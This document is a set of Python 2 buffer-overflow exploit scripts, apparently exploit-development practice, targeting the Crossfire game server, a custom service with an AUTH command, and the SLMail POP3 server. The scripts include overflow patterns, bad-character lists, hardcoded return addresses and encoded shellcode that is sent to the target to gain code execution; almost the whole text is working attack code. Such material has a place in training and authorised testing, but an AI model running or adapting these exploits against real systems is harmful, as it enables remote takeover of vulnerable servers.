
########Crossfire2################
#!/usr/bin/python
import socket


host= "127.0.0.1"

#patter = "A" *4368 + "B"*4 + "C"*7
badchar = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

patter = "A" *4368 + "B"*4 +badchar


buffer = "\x11(setup sound " + patter + "\x90\x00#"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending..."
s.connect((host, 13327))
data=s.recv(1024)
s.send(buffer)
print data
s.close()
#!/usr/bin/python
import socket


host= "127.0.0.1"

patter = "A" *4368 + "B"*4 + "C"*7


buffer = "\x11(setup sound " + patter + "\x90\x00#"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending..."
s.connect((host, 13327))
data=s.recv(1024)
s.send(buffer)
print data
s.close()

print "[*]Payload Sent !"


print "[*]Payload Sent !"

########vulnSRVOWN################
#!/usr/bin/python
import time, struct, sys
import socket as so

s = so.socket(so.AF_INET, so.SOCK_STREAM)
try:
     server = sys.argv[1]
     port = 5555
except IndexError:
     print "[+] Usage %s host" % sys.argv[0]
     sys.exit()


#ESP 01D1FE5C \x5c\xfe\xd1\x01
#req1 = "AUTH " + "A"*1100 
#req1 = "AUTH " + "A"* 1040 + "B"*4 +"C"*56
#req1 = "AUTH " + "A"* 1040 + "B"*4 +"C"*(1450 -1040 -4)
#badchar = (
#"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
#"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
#"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
#"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
#"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
#"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
#"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
#"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
#"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
#"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
#"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
#"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
#"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
#"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
#"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
#"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

payload = (
"\x9b\x3f\x4a\x91\xf8\x9b\x37\x41\x93\x9b\x91\x4b\x43\x9b\x91"
"\x42\xb8\xde\x66\x92\x38\xda\xcc\xd9\x74\x24\xf4\x5d\x33\xc9"
"\xb1\x52\x83\xed\xfc\x31\x45\x0e\x03\x9b\x68\x70\xcd\xdf\x9d"
"\xf6\x2e\x1f\x5e\x97\xa7\xfa\x6f\x97\xdc\x8f\xc0\x27\x96\xdd"
"\xec\xcc\xfa\xf5\x67\xa0\xd2\xfa\xc0\x0f\x05\x35\xd0\x3c\x75"
"\x54\x52\x3f\xaa\xb6\x6b\xf0\xbf\xb7\xac\xed\x32\xe5\x65\x79"
"\xe0\x19\x01\x37\x39\x92\x59\xd9\x39\x47\x29\xd8\x68\xd6\x21"
"\x83\xaa\xd9\xe6\xbf\xe2\xc1\xeb\xfa\xbd\x7a\xdf\x71\x3c\xaa"
"\x11\x79\x93\x93\x9d\x88\xed\xd4\x1a\x73\x98\x2c\x59\x0e\x9b"
"\xeb\x23\xd4\x2e\xef\x84\x9f\x89\xcb\x35\x73\x4f\x98\x3a\x38"
"\x1b\xc6\x5e\xbf\xc8\x7d\x5a\x34\xef\x51\xea\x0e\xd4\x75\xb6"
"\xd5\x75\x2c\x12\xbb\x8a\x2e\xfd\x64\x2f\x25\x10\x70\x42\x64"
"\x7d\xb5\x6f\x96\x7d\xd1\xf8\xe5\x4f\x7e\x53\x61\xfc\xf7\x7d"
"\x76\x03\x22\x39\xe8\xfa\xcd\x3a\x21\x39\x99\x6a\x59\xe8\xa2"
"\xe0\x99\x15\x77\xa6\xc9\xb9\x28\x07\xb9\x79\x99\xef\xd3\x75"
"\xc6\x10\xdc\x5f\x6f\xba\x27\x08\x9a\x30\x27\x89\xf2\x44\x27"
"\x1c\xb0\xc0\xc1\x74\xa6\x84\x5a\xe1\x5f\x8d\x10\x90\xa0\x1b"
"\x5d\x92\x2b\xa8\xa2\x5d\xdc\xc5\xb0\x0a\x2c\x90\xea\x9d\x33"
"\x0e\x82\x42\xa1\xd5\x52\x0c\xda\x41\x05\x59\x2c\x98\xc3\x77"
"\x17\x32\xf1\x85\xc1\x7d\xb1\x51\x32\x83\x38\x17\x0e\xa7\x2a"
"\xe1\x8f\xe3\x1e\xbd\xd9\xbd\xc8\x7b\xb0\x0f\xa2\xd5\x6f\xc6"
"\x22\xa3\x43\xd9\x34\xac\x89\xaf\xd8\x1d\x64\xf6\xe7\x92\xe0"
"\xfe\x90\xce\x90\x01\x4b\x4b\xb0\xe3\x59\xa6\x59\xba\x08\x0b"
"\x04\x3d\xe7\x48\x31\xbe\x0d\x31\xc6\xde\x64\x34\x82\x58\x95"
"\x44\x9b\x0c\x99\xfb\x9c\x04")


req1 = "AUTH " + "A"* 1040 + "\x71\x1d\xd1\x65" +payload+"C"*(1450 -1040 -4-367-16)

try:
       print "start"
       s.connect((server, port))
       print repr(s.recv(1024))
       s.send(req1)
       print repr(s.recv(1024))
       print "done"
except:
       print "[!] connection refused, check debugger"
       
########SLMmailOWN################
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


shellcode =("\x27\xfc\x3f\x2f\x41\x98\x2f\x93\x98\x43\x41\xfd\x98\x41\x98"
"\x92\xda\xc8\xd9\x74\x24\xf4\xb8\xac\xf7\xb0\x98\x5b\x31\xc9"
"\xb1\x52\x83\xc3\x04\x31\x43\x13\x03\xef\xe4\x52\x6d\x13\xe2"
"\x11\x8e\xeb\xf3\x75\x06\x0e\xc2\xb5\x7c\x5b\x75\x06\xf6\x09"
"\x7a\xed\x5a\xb9\x09\x83\x72\xce\xba\x2e\xa5\xe1\x3b\x02\x95"
"\x60\xb8\x59\xca\x42\x81\x91\x1f\x83\xc6\xcc\xd2\xd1\x9f\x9b"
"\x41\xc5\x94\xd6\x59\x6e\xe6\xf7\xd9\x93\xbf\xf6\xc8\x02\xcb"
"\xa0\xca\xa5\x18\xd9\x42\xbd\x7d\xe4\x1d\x36\xb5\x92\x9f\x9e"
"\x87\x5b\x33\xdf\x27\xae\x4d\x18\x8f\x51\x38\x50\xf3\xec\x3b"
"\xa7\x89\x2a\xc9\x33\x29\xb8\x69\x9f\xcb\x6d\xef\x54\xc7\xda"
"\x7b\x32\xc4\xdd\xa8\x49\xf0\x56\x4f\x9d\x70\x2c\x74\x39\xd8"
"\xf6\x15\x18\x84\x59\x29\x7a\x67\x05\x8f\xf1\x8a\x52\xa2\x58"
"\xc3\x97\x8f\x62\x13\xb0\x98\x11\x21\x1f\x33\xbd\x09\xe8\x9d"
"\x3a\x6d\xc3\x5a\xd4\x90\xec\x9a\xfd\x56\xb8\xca\x95\x7f\xc1"
"\x80\x65\x7f\x14\x06\x35\x2f\xc7\xe7\xe5\x8f\xb7\x8f\xef\x1f"
"\xe7\xb0\x10\xca\x80\x5b\xeb\x9d\xa4\x90\xf3\x1c\xd1\xa4\xf3"
"\x9f\x9a\x20\x15\xf5\xcc\x64\x8e\x62\x74\x2d\x44\x12\x79\xfb"
"\x21\x14\xf1\x08\xd6\xdb\xf2\x65\xc4\x8c\xf2\x33\xb6\x1b\x0c"
"\xee\xde\xc0\x9f\x75\x1e\x8e\x83\x21\x49\xc7\x72\x38\x1f\xf5"
"\x2d\x92\x3d\x04\xab\xdd\x85\xd3\x08\xe3\x04\x91\x35\xc7\x16"
"\x6f\xb5\x43\x42\x3f\xe0\x1d\x3c\xf9\x5a\xec\x96\x53\x30\xa6"
"\x7e\x25\x7a\x79\xf8\x2a\x57\x0f\xe4\x9b\x0e\x56\x1b\x13\xc7"
"\x5e\x64\x49\x77\xa0\xbf\xc9\x97\x43\x15\x24\x30\xda\xfc\x85"
"\x5d\xdd\x2b\xc9\x5b\x5e\xd9\xb2\x9f\x7e\xa8\xb7\xe4\x38\x41"
"\xca\x75\xad\x65\x79\x75\xe4")


buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" *8 +  shellcode


try:
	print "\nSending evil Buffer"
	s.connect(('IPIPIPIP',110))
	data = s.recv(1024)
	s.send('USER username' + '\r\n')
	data = s.recv(1024)
	s.send('PASS ' + buffer + '\r\n')
	print '\ndone'
except:
	print "Could not connect to pop3"
